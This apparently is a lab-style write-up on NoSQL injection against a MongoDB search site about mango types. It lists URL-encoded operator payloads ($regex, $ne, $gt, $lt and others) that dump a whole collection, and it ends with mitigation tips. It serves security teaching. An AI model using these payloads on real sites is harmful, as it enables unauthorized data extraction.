In traditional SQL databases, in-band data extraction vulnerabilities can often lead to the entire database being exfiltrated. In MongoDB, however, since it is a non-relational database and queries are performed on specific collections, attacks are (usually) limited to the collection the injection applies to.
The website is a basic search application where you can find facts about various types of mangoes.
The search form sends a GET request where the search query is passed as ?q=<search term>. On the server side, the request likely queries the database like this:
db.types.find({
name: $_GET['q']
});Use a RegEx query that matches everything:
db.types.find({
name: {$regex: /.*/}
});URL-encoded payload:
?q[$regex]=.*
$ne (not equal):
db.types.find({
name: {$ne: 'doesntExist'}
});URL-encoded: ?q[$ne]=doesntExist
$gt (greater than):
db.types.find({
name: {$gt: ''}
});URL-encoded: ?q[$gt]=
$gte (greater than or equal):
db.types.find({
name: {$gte: ''}
});URL-encoded: ?q[$gte]=
$lt (less than):
db.types.find({
name: {$lt: '~'}
});URL-encoded: ?q[$lt]=~
$lte (less than or equal):
db.types.find({
name: {$lte: '~'}
});URL-encoded: ?q[$lte]=~
- In-band extraction is limited to the specific collection being queried
- Use
$regex: /.*/to match all documents in the collection - Alternative operators like
$ne,$gt,$gte,$lt,$ltecan achieve similar results - Always URL-encode special characters in payloads
- The
~character works well with$lt/$lteas it's the largest printable ASCII value
- Validate and sanitize user input before passing to MongoDB queries
- Use parameterized queries or input validation
- Implement proper access controls to limit data exposure
- Consider using MongoDB's built-in security features